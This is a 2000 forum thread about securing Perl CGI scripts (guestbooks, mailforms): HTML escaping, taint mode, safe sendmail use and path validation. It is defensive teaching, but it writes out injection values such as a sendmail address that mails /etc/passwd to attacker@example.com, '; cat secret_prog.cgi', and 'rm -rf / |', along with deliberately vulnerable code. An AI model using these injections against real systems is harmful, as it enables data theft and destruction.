security holes
i need some very basic information. which kind of user-input must be washed from any dangerous 'things'? and how to do that?
i have a mailform, a guestbook-script and a postcard-function on one of my sites, now i was wondering about the risk i'm taking with them... in which situation can user-input be risky?
japhy posted this at 14:01 — 13th December 2000.
They have: 161 posts
Joined: Dec 1999
You have several options when accepting text from a form for displaying on an HTML page.
* escape potentially unsafe characters -- change < to &lt; and > to &gt; and & to &amp;, and you'll be safe
While it would be very cool of you to incorporate a working HTML parser in your guestbook or message board, etc., so that people can use (a select subset of) tags normally, it's probably far easier to use a combination of 3 and 4.
That's what I see practically all forums doing nowadays. My only qualm is that I don't see the forums telling me the precise usage of brackets -- where can I have whitespace? Do I need to escape brackets that aren't to be interpreted as tags? Etc. With HTML parsing, you can be very explicit with instructions: "you are allowed to enter tags normally, but only <a>, <b>, and <i> tags will be recognized".
Ok, that's my spiel.
merlin posted this at 14:31 — 13th December 2000.
They have: 410 posts
Joined: Oct 1999
great!
how do i include such a parser and how do i use it? i think i'll consult my perlbooks...
that sounds great! i'd say this is an 'easy' regexp s/
japhy posted this at 14:43 — 13th December 2000.
They have: 161 posts
Joined: Dec 1999
Another place to take caution is when you use user input in a system command. Take this VERY SIMPLE (and very insecure) CGI program:
#!/usr/bin/perl
use CGI 'param';
my $function = param('perlfunc');
print "Content-type: text/plain\n\n";
print `perldoc -f $function`;
This code is supposed to get the name of a Perl function from a form (the text element is called 'perlfunc'), and then display the information about that function in the 'perlfunc' document. Who can find the security hole?
What if I enter "; ls -lag" as my "perl function"? Now, my program blindly runs perldoc -f; ls -lag, and the user sees the contents of the current directory. Hmm, and since all Perl CGI programs have to be readable by the 'nobody' user, that means that I can see the NAMES of the other CGI programs.
Then I can just send the program "; cat secret_prog.cgi" and now I've seen the contents of THAT program -- I sure hope you don't use plaintext passwords, or you're ruined.
The solution is to use Perl's taint checking. This is available with the -T switch to perl. Taint checking requires you validate input from outside of your program -- this is usually done with a rigorous regex to ensure the right stuff:
#!/usr/bin/perl -T
use CGI 'param';
my ($func) = param('perlfunc') =~ /(-[a-zA-Z]|[a-zA-Z]+)/;
# notice the ()'s around $func -- this is important
# a regex in LIST CONTEXT returns parenthesized sub-patterns
# so $func gets set to the valid portion of the string, if any
print "Content-type: text/plain\n\n";
print `perldoc -f $func`;
That program should run... right? Sorry. Perl thinks the environment is unsafe, and requests that you make it safe, too -- specifically, $ENV{PATH}. This is so that YOU run the 'perldoc' program you THINK you're running.
#!/usr/bin/perl -wT
use CGI 'param';
use strict;
# we should always use -w and 'strict' and -T for CGI programs
$ENV{PATH} = "/bin:/usr/bin:/usr/local/bin";
my ($func) = param('perlfunc') =~ /(-[a-zA-Z]|[a-zA-Z]+)/;
print "Content-type: text/plain\n\n";
print `perldoc -f $func`;
That runs fine. And, for even more safety, you might want to change that last line to have the full path to 'perldoc', just in case you're paranoid (which you should be).
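Here is a rough sketch of how that stricter version might look. The helper names valid_perlfunc and perldoc_for are made up for illustration, the /usr/bin/perldoc path is an assumption about your system, and the list form of pipe open needs a reasonably recent perl (5.8 or later). Unlike the regex above, this one is anchored, so input such as "; ls -lag" is rejected outright instead of being trimmed down to "ls". It would still sit alongside the -T switch and the $ENV{PATH} line shown above.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: return the function name if the WHOLE input is a
# file-test operator (-e, -f, ...) or a plain word; otherwise return undef.
sub valid_perlfunc {
    my ($input) = @_;
    return undef unless defined $input;
    # \A and \z anchor the match to the entire string, newline included.
    my ($func) = $input =~ /\A(-[a-zA-Z]|[a-zA-Z][a-zA-Z0-9]*)\z/;
    return $func;
}

# Hypothetical wrapper: run perldoc without handing a command line to a shell.
sub perldoc_for {
    my ($func) = @_;
    # List-form pipe open passes each argument straight to the program.
    # The full path is an assumption; adjust it for your machine.
    open(my $fh, '-|', '/usr/bin/perldoc', '-f', $func)
        or die "can't run perldoc: $!";
    local $/;                 # slurp the whole output at once
    my $text = <$fh>;
    close $fh;
    return $text;
}
```

In the CGI program you would call valid_perlfunc(param('perlfunc')) first and only call perldoc_for when it returns a defined value.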
This is a simplistic example -- the big error I often see is people calling a mail program with the user's email address ON THE COMMAND-LINE. This is just a hole waiting to be exploited:
open MAIL, "| /usr/bin/sendmail $email";
Ouch. I don't think anyone REALLY has an email address of "user@example.com; mail attacker@example.com < /etc/passwd", but someone SURE could enter that. You're probably best off not trying to validate an email address yourself, but rather, tell sendmail (or whatever client you use) to look in the headers of the message for the To: field:
open MAIL, "| /usr/bin/sendmail -t" or die "can't run sendmail: $!";
That's all for now (again).
Be sure to read the perlsec documentation, which covers tainting in more detail.
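One thing to watch with the sendmail -t approach: the address now travels in the message headers, so a value containing a line break could add headers of its own. The sketch below is one possible guard, not the only one. build_message is a hypothetical helper name, and the subject and body parameters are assumptions about what a mailform collects.

```perl
use strict;
use warnings;

# Hypothetical helper: build the text to print to "sendmail -t".
# Returns undef if a header value contains a line break, since that
# would let the sender add extra headers such as "Bcc:".
sub build_message {
    my ($to, $subject, $body) = @_;
    for my $value ($to, $subject) {
        return undef if !defined $value or $value =~ /[\r\n]/;
    }
    # A blank line separates the headers from the body.
    return "To: $to\nSubject: $subject\n\n$body\n";
}

# Possible usage (commented out so the sketch has no side effects):
# my $msg = build_message($email, 'Guestbook entry', $text)
#     or die "bad header value";
# open MAIL, "| /usr/bin/sendmail -t" or die "can't run sendmail: $!";
# print MAIL $msg;
# close MAIL or warn "sendmail reported a problem: $?";
```

Note that sendmail still parses the To: line itself, so a value with several comma-separated addresses would reach several recipients. Whether that matters depends on your form.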
japhy posted this at 15:02 — 13th December 2000.
They have: 161 posts
Joined: Dec 1999
The simplest mechanism is to set up a translation table:
my %HTML = (
'<' => 'lt',
'>' => 'gt',
'&' => 'amp',
);
Then create a regex based on the keys:
my $REx = "[" . join("", keys %HTML) . "]"; # e.g. [<>&] -- the key order varies
And then use it:
$user_content =~ s/($REx)/&$HTML{$1};/g;
(Notice how I saved the & and ; for the very end, there, instead of putting them in EVERY SINGLE value in the hash.)
There's a module for this already, HTML::Entities, which does even more -- it fixes accented characters and such. It's quite useful and comprehensive.
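Put together, the translation-table approach could be wrapped in a small subroutine like this. It is only a sketch: escape_html is a made-up name, and the extra entry for the double quote is my own addition, on the assumption that the text may end up inside an attribute value.

```perl
use strict;
use warnings;

my %HTML = (
    '<' => 'lt',
    '>' => 'gt',
    '&' => 'amp',
    '"' => 'quot',   # assumption: needed when output lands inside an attribute
);

# Hypothetical helper: return a copy of the text with the characters
# above replaced by their entities.
sub escape_html {
    my ($text) = @_;
    # One pass over the string, so the "&" of an entity we just wrote
    # is never escaped a second time.
    $text =~ s/([<>&"])/&$HTML{$1};/g;
    return $text;
}

print escape_html('<b>Tom & "Jerry"</b>'), "\n";
```

Call it on every piece of user text at the point where you print it into the page, rather than when you store it.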
As far as HTML parsers go, you're not likely to find much about them in your books. I've not used HTML::Parser, but I can tell you how to use my YAPE::HTML module. Once you get the module from http://www.pobox.com/~japhy/YAPE/HTML.pm then you can try this program. This program will spit out the HTML content, and remove ALL TAGS except for <a>, <b>, and <i>.
This can be run as a CGI program OR as a command-line program. This reads a sample HTML file from beneath the __DATA__ marker in the file.
#!/usr/bin/perl -w
use YAPE::HTML;
use strict;
print "Content-type: text/html\n\n" if $ENV{REMOTE_HOST};
my $content;
{ local $/; $content = <DATA>; }
my $parser = YAPE::HTML->new($content);
my %ok = map +($_, 1), qw( a b i );
while (my $chunk = $parser->next) {
  next if
    $chunk->type eq 'comment' or
    $chunk->type eq 'tag' and not $ok{$chunk->tag} or
    $chunk->type eq 'closetag' and not $ok{$chunk->tag};
  print $chunk->string;
}
__DATA__
This is such a <b>cool</b> site.
<hr>
I hope all this markup gets <i>through</i> ok...
<br><br>
<h2 align="center">Hooray for <a href="http://www.perl.com/">Perl</a>!</h2>
<a href="http://www.pobox.com/~japhy/">Jeff's</a> web site
This code, when run, will produce:
This is such a <b>cool</b> site.
I hope all this markup gets <i>through</i> ok...
Hooray for <a href="http://www.perl.com/">Perl</a>!
<a href="http://www.pobox.com/~japhy/">Jeff's</a> web site
As you can see, it handles nested elements fine (even if a good element is in a bad element, or vice-versa).
I apologize for the UTTER lack of documentation in the module, but I assure you it will look much better once it is officially released. In the meantime, I offer any and all user support needed. I hope the sample code above is pretty self-explanatory, though.
merlin posted this at 15:27 — 13th December 2000.
They have: 410 posts
Joined: Oct 1999
oh well, i see there's a long way to go... thank you for your help! it'll take some time to learn all this stuff... but another short question for my understanding: does it matter where (cgi-bin dir or htdocs dir) the data is stored? or does it always remain a security risk?
japhy posted this at 15:44 — 13th December 2000.
They have: 161 posts
Joined: Dec 1999
It is far safer to store your data in a directory NOT accessible from the web. That will make it impossible to be reached from the web UNLESS you provide a person a gateway to get the content, like:
open FILE, $some_path_the_user_enters;
That line is unsafe in and of itself. I could enter "/etc/passwd", or "rm -rf / |", or something else bad. The point is that you should not trust the end user, and should make sure that you are ok with what they give you. Paranoia helps in this case.
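A sketch of a more careful gateway follows. The names data_path and read_data, the /home/site/data directory and the .txt suffix are all assumptions for illustration. The idea is to accept only a bare name, build the path yourself, and use three-argument open so that a leading or trailing "|" is never treated as a command.

```perl
use strict;
use warnings;

# Assumption: all data files live in one directory outside the web root.
my $DATA_DIR = '/home/site/data';   # hypothetical path

# Hypothetical helper: turn a user-supplied name into a path inside
# $DATA_DIR, or return undef if the name holds anything other than
# letters, digits, underscores and hyphens (so no "/", "..", "|", spaces).
sub data_path {
    my ($name) = @_;
    return undef unless defined $name;
    my ($clean) = $name =~ /\A([A-Za-z0-9_-]+)\z/;
    return defined $clean ? "$DATA_DIR/$clean.txt" : undef;
}

# Hypothetical helper: read one data file, or return undef on any problem.
sub read_data {
    my ($name) = @_;
    my $path = data_path($name) or return undef;
    # With an explicit '<' mode the path is only ever opened for reading.
    open(my $fh, '<', $path) or return undef;
    local $/;                 # slurp the whole file
    my $content = <$fh>;
    close $fh;
    return $content;
}
```

With this in place, "/etc/passwd" and "rm -rf / |" are both refused before open is ever called.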
Mark Hensler posted this at 03:01 — 14th December 2000.
He has: 4,048 posts
Joined: Aug 2000
um...
Aren't you also supposed to escape $ and @ and %?
if you get user input containing:
"blah $ENV{PATH} blah"
won't it print "blah ", then whatever $ENV{PATH} is, then " blah"?
and same for @arrays and %hashes?
Mark Hensler
If there is no answer on Google, then there is no question.
japhy posted this at 03:19 — 14th December 2000.
They have: 161 posts
Joined: Dec 1999
Perl does interpolation only on things in your code. If you run the following Perl program:
#!/usr/bin/perl
$X = 100;
print $ARGV[0];
and run it as perl my_program 'this is $X', you'll get the actual string this is $X, you won't get this is 100.
If that worked, templates would be simple. But Perl would also be terribly insecure.
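If you do want template-like behaviour, you have to ask for it explicitly. Here is a small sketch, with fill_template as a made-up name: it substitutes only the names you list in a hash and leaves every other $word exactly as the user typed it.

```perl
use strict;
use warnings;

# Hypothetical helper: replace $name placeholders from an explicit table.
# Names that are not in the table are left untouched.
sub fill_template {
    my ($text, $values) = @_;
    $text =~ s/\$(\w+)/exists $values->{$1} ? $values->{$1} : "\$$1"/ge;
    return $text;
}

my $X = 100;
my $input = 'this is $X';      # data, not code: Perl does not interpolate it
print "$input\n";              # the string is printed as-is
print fill_template($input, { X => $X }), "\n";
```

The first print shows the input unchanged, and the second shows the value filled in only because X was explicitly allowed.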